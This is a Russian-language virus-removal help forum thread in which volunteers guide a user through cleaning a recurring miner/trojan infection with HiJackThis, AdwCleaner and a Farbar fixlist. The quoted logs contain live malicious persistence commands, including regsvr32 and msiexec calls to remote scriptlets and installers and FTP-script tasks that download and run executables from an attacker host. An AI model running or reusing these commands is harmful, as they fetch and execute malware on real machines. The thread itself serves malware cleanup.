Перейти к содержанию

Устал пробовать удалить трояны, что делать?


Enuard

Рекомендуемые сообщения

Добрый день. Очень неприятная ситуация. 

если в кратце - каждый день просматриваю антивирусом (др.веб куррент) на наличие вирусов - каждый день появляются одни и те же вирусы. Вчера перед сном, снова прогнал антивирус, удалил все найденные файлы, удалил задачи в планировщике задач, прогнал антивирусом снова - ничего не нашёл. запустил интернет, полазил в сети, прогнал через 40 минут - снова ничего не нашёл.

Сегодня утром, включив компьютер, проверил антивирусом - ничего не нашёл. вышел в сеть. полазил 1 час и вуаля - картина прежняя - снова всё то же самое, только в меньшем количестве. Скрин троянов прилагаю. 

Я удалял уже раз 10 данные вирусы, но каким то чудом они появляются снова и снова. 

Что нужно сделать? самое интересное то, что каким то образом в планировщик задач виндовс ложится троянская задача, которая активируется при включении компьютера. Но каким образом она туда ложиться, как? 

post-51935-0-75433300-1543393299_thumb.jpg

Ссылка на комментарий
Поделиться на другие сайты

Этот файл нужно загрузить?

 

Лог сделал уже после ручной чистки системы. С планировщика задач удалял самостоятельно.

CollectionLog-2018.11.28-12.04.zip

Изменено пользователем Enuard
Ссылка на комментарий
Поделиться на другие сайты

Деинсталлируйте:
 

Kodobi
Muz.La
QIPApp
SafeFinder
Time tasks
Unity Web Player
YoutubeAdBlock
YoutubeDownloader
Амиго
Кнопка "Яндекс" на панели задач
 
Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера).
 
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Default_Search_URL] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = http://securedsearch.lavasoft.com/?pr=vmn&id=webcompa&ent=hp_WCYID10477_754_181124
R0 - HKCU\Software\Microsoft\Internet Explorer\Search: [Default_Search_URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms}
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Search: [CustomizeSearch] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text=
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Search: [SearchAssistant] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text=
R1 - HKCU\Software\Microsoft\Internet Explorer\Main: [SearchAssistant] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms}
R3 - HKCU: Default URLSearchHook is missing
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3C}: [URL,SuggestionsURL,SuggestionsURLFallback] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text={searchTerms} - >>
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3D}: [URL,SuggestionsURL,SuggestionsURLFallback] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text= - >>
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9}: [URL,TopResultURL] = http://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10477_754_181124&q={searchTerms} - Ad-Aware SecureSearch
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}: [SuggestionsURL_JSON] = http://suggestqueries.google.com/complete/search?output=firefox&client=firefox&qu={searchTerms} - Search the web
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}: [URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms} - Search the web
O2 - HKLM\..\BHO: YoutubeAdBlock - {D1660F2C-BBC4-4D94-A6BA-EB25BC207DA5} - C:\Program Files (x86)\loreCZYyGIE\tX4f0SHi.dll (file missing)
O2-32 - HKLM\..\BHO: YoutubeAdBlock - {D1660F2C-BBC4-4D94-A6BA-EB25BC207DA5} - C:\Program Files (x86)\loreCZYyGIE\khWBmmjYw.dll (file missing)
O4 - MSConfig\startupreg: 3409050 [command] = C:\Users\TES_EidEnuard\AppData\Roaming\c3ctu3bioct\thu0uaobnre.exe /VERYSILENT (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: 6715148 [command] = C:\Users\TES_EidEnuard\AppData\Roaming\ofgjqr2sfa3\wmlzrhprcbu.exe /VERYSILENT (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: GoogleChromeAutoLaunch_0A5C1D289E966614EB8E1614E6915EC6 [command] = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --no-startup-window /prefetch:5 (HKCU) (2018/11/24)
O4 - MSConfig\startupreg: Kodobi [command] = C:\Users\TES_EidEnuard\AppData\Roaming\Kodobi\python\pythonw.exe "load.pyc" ml2 (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: LateCherry [command] = C:\Windows\rss\csrss.exe (HKCU) (2018/11/24)
O4 - MSConfig\startupreg: MailRuUpdater [command] = C:\Users\TES_EidEnuard\AppData\Local\Mail.Ru\MailRuUpdater.exe (HKCU) (2015/04/19) (file missing)
O4 - MSConfig\startupreg: Multitimer [command] = C:\Program Files (x86)\Multitimer\Multitimer.exe (HKLM) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: P9-PJsboRr.exe [command] = C:\Program Files\Common Files\HIYOKC07A\P9-PJsboRr.exe (HKCU) (2018/11/24)
O4 - MSConfig\startupreg: QIPApp [command] = C:\Users\TES_EidEnuard\AppData\Roaming\QIPApp\QIPApp.exe (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: Timestasks [command] = C:\Program Files (x86)\Zaxar\timetasks.exe (HKLM) (2015/04/19) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\TES_EidEnuard\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\TES_EidEnuard\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2018/11/24) (file missing)
O4 - MSConfig\startupreg: ZaxarGameBrowser [command] = C:\Program Files (x86)\Zaxar\ZaxarGameBrowser.exe -s (HKLM) (2015/04/19) (file missing)
O4 - MSConfig\startupreg: ZaxarLoader [command] = C:\Program Files (x86)\Zaxar\ZaxarLoader.exe /verysilent (HKLM) (2015/04/19) (file missing)
O4 - MSConfig\startupreg: amigo [command] = C:\Users\TES_EidEnuard\AppData\Local\Amigo\Application\amigo.exe --no-startup-window (HKCU) (2015/04/19)
O4 - MSConfig\startupreg: baidusdTray [command] = C:\Program Files (x86)\Baidu\BaiduSd\3.0.0.4605\BaiduSdTray.exe -stmd=3 (HKLM) (2015/04/19) (file missing)
O4 - MSConfig\startupreg: chrome [command] = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --headless --disable-gpu --remote-debugging-port=9222 http://ner-de-mi-nis-6.info/cdn-495.html?t=0.4 (HKLM) (2018/11/24)
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll (HKLM) (2018/11/27)
O4 - MSConfig\startupreg: start1 [command] = C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/08/06)
O4 - MSConfig\startupreg: windowsmanager [command] = C:\Users\TES_EidEnuard\AppData\Local\Temp\5290\5290.exe (HKCU) (2015/04/19) (file missing)
O4 - User Startup: C:\Users\TES_EidEnuard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutorunsDisabled (folder)
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll
O20 - HKLM\..\Windows: [AppInit_DLLs] = C:\ProgramData\Kolnixo\Ranex.dll (file missing)
O20-32 - HKLM\..\Windows: [AppInit_DLLs] = C:\ProgramData\Kolnixo\Sunlam.dll (file missing)
 
  • Запустите его (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Сканировать" и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt.
  • Прикрепите отчет к своему следующему сообщению.
 
Подробнее читайте в этом руководстве.
 

 

Ссылка на комментарий
Поделиться на другие сайты


Запустите повторно AdwCleaner (by Xplode) (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора),  нажмите кнопку "Scan", а по окончанию сканирования нажмите кнопку "Очистить" ("Clean") и дождитесь окончания удаления.

Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[C00].txt.

Прикрепите отчет к своему следующему сообщению


Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

 

Подробнее читайте в этом руководстве.
Ссылка на комментарий
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool  NAAC5Ba.png и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

  1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".

Нажмите кнопку Scan.

После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.

Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.


3munStB.png
Ссылка на комментарий
Поделиться на другие сайты

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

 


  •  


  • Временно выгрузите антивирус, файрволл и прочее защитное ПО.


  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:



CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll
HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {025d3e04-e211-11e4-97c1-806e6f6e6963} - D:\SETUP.EXE
HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {17bc0f4c-641a-11e5-b3d8-eac460abedba} - F:\AutoRun.exe {D2D77DC2-8299-11D1-8949-444553540000} 5.2066.1.A11B02 PID_0083
HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {1f7a6424-ff08-11e5-8239-e741ff5375b4} - F:\Autorun.exe
HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {4a745ccf-9d27-11e6-8f34-9819b52af906} - E:\setup.exe
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{55863ed5-349c-4e75-9ba2-e35dfdca26ad} <==== ATTENTION (Restriction - IP)
C:\Users\TES_EidEnuard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccfifbojenkenpkmnbnndeadpfdiffof
C:\Users\TES_EidEnuard\AppData\Local\Google\Chrome\User Data\Default\Extensions\dncemeillcpbjocckembodmbpaclamkp
C:\Users\TES_EidEnuard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfmjpfoggikolkfilofbpgcnhdcgahib
OPR Extension: (Универсальный перевод для Chrome) - C:\Users\TES_EidEnuard\AppData\Roaming\Opera Software\Opera Stable\Extensions\gdalhedleemkkdjddjgfjmcnbpejpapp [2015-04-22]
OPR Extension: (No Name) - C:\Users\TES_EidEnuard\AppData\Roaming\Opera Software\Opera Stable\Extensions\jniljaamodclkmphgkgkooplflhkadpg [2017-06-15]
S2 Windows Audio Control; C:\Program Files (x86)\Common Files\conime.exe -s [X]
S1 bd0001; C:\Windows\SysWOW64\DRIVERS\bd0001.sys [202704 2015-04-19] (Baidu)
S1 bd0002; C:\Windows\SysWOW64\DRIVERS\bd0002.sys [198600 2015-04-19] (Baidu)
S0 58203443; system32\drivers\85127761.sys [X]
S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]
S1 bd0003; system32\DRIVERS\bd0003.sys [X]
S2 BDArKit; \??\C:\Windows\System32\Drivers\BDArKit.SYS [X]
S1 BDFileDefend; system32\DRIVERS\BDFileDefend.sys [X]
S1 BDMWrench_x64; system32\DRIVERS\BDMWrench_x64.sys [X]
S1 BdSandBox; system32\DRIVERS\BdSandBox.sys [X]
2018-11-30 05:35 - 2018-11-30 19:37 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
2018-11-30 05:35 - 2018-11-30 19:37 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
2018-11-30 05:35 - 2018-11-30 19:37 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
2018-11-30 05:35 - 2018-11-30 19:37 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2018-11-30 05:35 - 2018-11-30 19:37 - 000003186 _____ C:\Windows\System32\Tasks\ok
2018-11-25 15:42 - 2018-11-30 20:30 - 000000081 _____ C:\Windows\system32\s
2018-11-25 15:42 - 2018-11-30 20:30 - 000000079 _____ C:\Windows\system32\ps
2018-11-25 15:42 - 2018-11-30 20:30 - 000000077 _____ C:\Windows\system32\p
2018-11-24 12:04 - 2018-11-24 12:04 - 000000000 ____D C:\Users\TES_EidEnuard\AppData\LocalLow\uVLgKJnzBrgAs
2018-11-24 11:54 - 2018-11-25 14:42 - 000000008 __RSH C:\Users\TES_EidEnuard\ntuser.pol
2018-11-24 11:36 - 2018-11-24 11:36 - 002024733 _____ C:\Users\TES_EidEnuard\AppData\Local\Vianix.tst
2018-11-24 11:36 - 2018-11-24 11:36 - 001995264 _____ (TODO: <Company name>) C:\Users\TES_EidEnuard\AppData\Local\Vianix.exe
2018-11-24 11:36 - 2018-11-24 11:36 - 001895384 _____ C:\Users\TES_EidEnuard\AppData\Local\Mathdex.bin
2018-11-24 11:36 - 2018-11-24 11:36 - 000722944 _____ C:\Users\TES_EidEnuard\AppData\Local\sham.db
2018-11-24 11:36 - 2018-11-24 11:36 - 000278510 _____ C:\Users\TES_EidEnuard\AppData\Local\Hatlight.bin
2018-11-24 11:36 - 2018-11-24 11:36 - 000140800 _____ C:\Users\TES_EidEnuard\AppData\Local\installer.dat
2018-11-24 11:36 - 2018-11-24 11:36 - 000126464 _____ C:\Users\TES_EidEnuard\AppData\Local\noah.dat
2018-11-24 11:36 - 2018-11-24 11:36 - 000070896 _____ C:\Users\TES_EidEnuard\AppData\Local\Config.xml
2018-11-24 11:36 - 2018-11-24 11:36 - 000005568 _____ C:\Users\TES_EidEnuard\AppData\Local\md.xml
2018-11-24 11:36 - 2018-11-24 11:36 - 000000003 _____ C:\Users\TES_EidEnuard\AppData\Local\wbem.ini
2018-11-30 19:37 - 2018-03-21 15:29 - 000000171 _____ C:\Program Files\Common Files\xp.dat
2018-11-30 19:36 - 2018-06-27 04:59 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
2018-11-24 10:29 - 2018-08-18 20:22 - 000000086 _____ C:\Program Files\Common Files\nsaok.dat
2013-02-07 15:22 - 2013-02-07 15:22 - 000050330 _____ () C:\Program Files (x86)\AntiDust.exe
2016-04-05 21:12 - 2002-09-12 10:05 - 000000453 _____ () C:\Program Files (x86)\ggwdc.ini
2018-08-18 20:22 - 2018-11-24 10:29 - 000000086 _____ () C:\Program Files\Common Files\nsaok.dat
2018-03-21 15:29 - 2018-11-30 19:37 - 000000171 _____ () C:\Program Files\Common Files\xp.dat
2018-06-27 04:59 - 2018-11-30 19:36 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2018-11-24 11:36 - 2018-11-24 11:36 - 007813632 _____ () C:\Users\TES_EidEnuard\AppData\Local\agent.dat
2018-11-24 11:36 - 2018-11-24 11:36 - 000070896 _____ () C:\Users\TES_EidEnuard\AppData\Local\Config.xml
2018-11-24 13:26 - 2018-11-24 13:26 - 006161408 _____ () C:\Users\TES_EidEnuard\AppData\Local\dump007.dat
2018-11-24 11:36 - 2018-11-24 11:36 - 000278510 _____ () C:\Users\TES_EidEnuard\AppData\Local\Hatlight.bin
2018-11-24 11:36 - 2018-11-24 11:36 - 000140800 _____ () C:\Users\TES_EidEnuard\AppData\Local\installer.dat
30598-05-30 11:27 - 30598-05-30 11:27 - 000186368 ____N (Microsoft Corporation) C:\Users\TES_EidEnuard\AppData\Local\iYmPYkeVYOOIF.exe
2018-11-24 11:36 - 2018-11-24 11:36 - 001895384 _____ () C:\Users\TES_EidEnuard\AppData\Local\Mathdex.bin
2018-11-24 11:36 - 2018-11-24 11:36 - 000005568 _____ () C:\Users\TES_EidEnuard\AppData\Local\md.xml
2018-11-24 11:36 - 2018-11-24 11:36 - 000126464 _____ () C:\Users\TES_EidEnuard\AppData\Local\noah.dat
2018-11-25 12:17 - 2018-11-25 14:29 - 000007627 _____ () C:\Users\TES_EidEnuard\AppData\Local\Resmon.ResmonCfg
2018-11-24 11:36 - 2018-11-24 11:36 - 000722944 _____ () C:\Users\TES_EidEnuard\AppData\Local\sham.db
2018-11-24 11:36 - 2018-11-24 11:36 - 000032038 _____ () C:\Users\TES_EidEnuard\AppData\Local\uninstall_temp.ico
2018-11-24 11:36 - 2018-11-24 11:36 - 001995264 _____ (TODO: <Company name>) C:\Users\TES_EidEnuard\AppData\Local\Vianix.exe
2018-11-24 11:36 - 2018-11-24 11:36 - 002024733 _____ () C:\Users\TES_EidEnuard\AppData\Local\Vianix.tst
2018-11-24 11:36 - 2018-11-24 11:36 - 000000003 _____ () C:\Users\TES_EidEnuard\AppData\Local\wbem.ini
Task: {009817C0-455B-48E2-991B-9C03ED82246E} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {0694AA53-66CA-431F-8DB7-B737DEABBD8B} - \NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION
Task: {0DDFF42A-51A9-4C81-9B33-0F76ED5C98E9} - \NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION
Task: {392AAA25-BB34-4EAC-B4AE-2E62D6798DC1} - \NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION
Task: {3B5FF40A-E972-4103-B5C5-5C29A4C8FA40} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {3FF2EA7B-FF0B-45E5-AAA4-319FC18D2B00} - \YoutubeDownloader -> No File <==== ATTENTION
Task: {4492BAB8-F6C8-4635-8A41-7CBAC2949559} - \ClwhhsndxrpfQ2 -> No File <==== ATTENTION
Task: {4FED48E9-0429-4D83-98D4-719CE7FBED0F} - \Kodobi -> No File <==== ATTENTION
Task: {5551218B-E4C7-4DB8-942A-979832795BA1} - \GameNet -> No File <==== ATTENTION
Task: {59DD6E35-407B-43D6-B3A8-647D54C3FF88} - \YoutubeDownloader_upd -> No File <==== ATTENTION
Task: {6421A2F1-39A3-417D-AA71-0F074547D866} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {6C13B6A3-1D39-439A-8A40-D388FEB4BFCE} - \NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION
Task: {6CFA1A02-53EB-492D-8672-C56D48CE9CA3} - \NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION
Task: {715D7ECA-37EA-4B5B-87A8-6B9120279DE8} - \GoogleUpdateTaskMachineCore -> No File <==== ATTENTION
Task: {74F95EC3-F666-4118-A88C-68E54DC42147} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {7B3C6D90-365D-43ED-BD1F-72DFB651B6AA} - \GoogleUpdateTaskMachineUA -> No File <==== ATTENTION
Task: {9632AFFB-50F3-4486-9A3C-0932C1FEE407} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {B9A75CEC-6F7D-44AC-B4DF-ED379B7B602F} - \NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION
Task: {F3A09529-D564-486C-9E44-F4881DF28604} - \NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION
Task: {F3C334C7-A1D4-4580-9CD9-DFB20A690CCB} - \Kodobi2 -> No File <==== ATTENTION
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer: <==== ATTENTION
C:\Windows\rss
FirewallRules: [{C406C767-D75E-4FAB-A623-44AF4D24CA79}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{EFB2418D-FBD3-40FD-892B-0DED0A225588}] => (Allow) C:\Windows\rss\csrss.exe
EmptyTemp:



  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!


  • Обратите внимание, что компьютер будет перезагружен.


  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

Ссылка на комментарий
Поделиться на другие сайты

прикрепляю. 

Вчера устанавливал было майл агент и хотел проверить одно приложение от майла. Установился gamecentr майловский, после обнаружил снова появившийся конхост. 
Сегодня проверил через Др.Веб куррент, он так же обнаружил данный конхост. вместе с ним обнаружил задачи в планировщике задач виндовса: Mysa, Mysa1, Mysa2, Mysa3, ok. 

В очередной раз удалил данные задачи. До установки майл агента и геймцентра майловского не проверял на наличие данных троянов. 
 

FRST.txt

Addition.txt

Ссылка на комментарий
Поделиться на другие сайты

Ну так что можно сделать? вирусы снова появилисьт, как понимаю, они скачиваются через какое то приложение\программу. При подключении к сети, происходит скачивание файлов и автоматический запуск через систему

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Namnayshka
      От Namnayshka
      Помогите, пожалуйста, поймал где-то heur trojan multi genbadur и касперский не справляется сам. Говорит что для лечения надо перезагрузка и после нее опять через 5 минут выдает предлагаемое лечение, и так по кругу. 
      Addition.txt Fixlog.txt FRST.txt
    • SiGiDi
      От SiGiDi
      Вчера установил файл, после его распаковки вылез экран смерти и после череп который моргает красно белым цветом, что мне делать

    • burbon
      От burbon
      Добрый день, просканировал систему через AVZ и увидел много красных сточек, однако в конце AVZ написал что, найдено вирусов 0, подозрений 0. И начались падения интернета, всё начало долго грузится и в играх пинг 200. Подскажите, что делать?
       
      Загружена база: сигнатуры - 297570, нейропрофили - 2, микропрограммы лечения - 56, база от 01.03.2016 12:37
      Загружены микропрограммы эвристики: 412
      Загружены микропрограммы ИПУ: 9
      Загружены цифровые подписи системных файлов: 790760
      Режим эвристического анализатора: Средний уровень эвристики
      Режим лечения: включено
      Версия Windows: 10.0.19045,  "Windows 10 Enterprise", дата инсталляции 11.12.2022 14:38:07 ; AVZ работает с правами администратора (+)
      Восстановление системы: включено
      1. Поиск RootKit и программ, перехватывающих функции API
      1.1 Поиск перехватчиков API, работающих в UserMode
       Анализ kernel32.dll, таблица экспорта найдена в секции .rdata
      Функция kernel32.dll:ReadConsoleInputExA (1133) перехвачена, метод ProcAddressHijack.GetProcAddress ->7580E3B4->75073800
      Функция kernel32.dll:ReadConsoleInputExW (1134) перехвачена, метод ProcAddressHijack.GetProcAddress ->7580E3E7->75073830
       Анализ ntdll.dll, таблица экспорта найдена в секции .text
      Функция ntdll.dll:NtCreateFile (296) перехвачена, метод ProcAddressHijack.GetProcAddress ->76F03550->7164F210
      Функция ntdll.dll:NtSetInformationFile (600) перехвачена, метод ProcAddressHijack.GetProcAddress ->76F03270->7164F370
      Функция ntdll.dll:NtSetValueKey (632) перехвачена, метод ProcAddressHijack.GetProcAddress ->76F03600->7164F3E0
      Функция ntdll.dll:ZwCreateFile (1841) перехвачена, метод ProcAddressHijack.GetProcAddress ->76F03550->7164F210
      Функция ntdll.dll:ZwSetInformationFile (2143) перехвачена, метод ProcAddressHijack.GetProcAddress ->76F03270->7164F370
      Функция ntdll.dll:ZwSetValueKey (2175) перехвачена, метод ProcAddressHijack.GetProcAddress ->76F03600->7164F3E0
       Анализ user32.dll, таблица экспорта найдена в секции .text
      Функция user32.dll:CallNextHookEx (1536) перехвачена, метод ProcAddressHijack.GetProcAddress ->7548BDE0->7164F100
      Функция user32.dll:SetWindowsHookExW (2399) перехвачена, метод ProcAddressHijack.GetProcAddress ->75490F70->7164F450
      Функция user32.dll:Wow64Transition (1504) перехвачена, метод CodeHijack (метод не определен)
       Анализ advapi32.dll, таблица экспорта найдена в секции .text
      Функция advapi32.dll:CveEventWrite (1234) перехвачена, метод ProcAddressHijack.GetProcAddress ->75E78072->75076200
      Функция advapi32.dll:I_ScRegisterPreshutdownRestart (1387) перехвачена, метод ProcAddressHijack.GetProcAddress ->75E78F99->75EDE320
       Анализ ws2_32.dll, таблица экспорта найдена в секции .text
       Анализ wininet.dll, таблица экспорта найдена в секции .text
       Анализ rasapi32.dll, таблица экспорта найдена в секции .text
       Анализ urlmon.dll, таблица экспорта найдена в секции .text
       Анализ netapi32.dll, таблица экспорта найдена в секции .text
      Функция netapi32.dll:NetFreeAadJoinInformation (130) перехвачена, метод ProcAddressHijack.GetProcAddress ->73CFD14A->652EDE90
      Функция netapi32.dll:NetGetAadJoinInformation (131) перехвачена, метод ProcAddressHijack.GetProcAddress ->73CFD179->652EE210
      1.4 Поиск маскировки процессов и драйверов
       Проверка не производится, так как не установлен драйвер мониторинга AVZPM
      2. Проверка памяти
       Количество найденных процессов: 11
       Количество загруженных модулей: 247
      Проверка памяти завершена
      3. Сканирование дисков
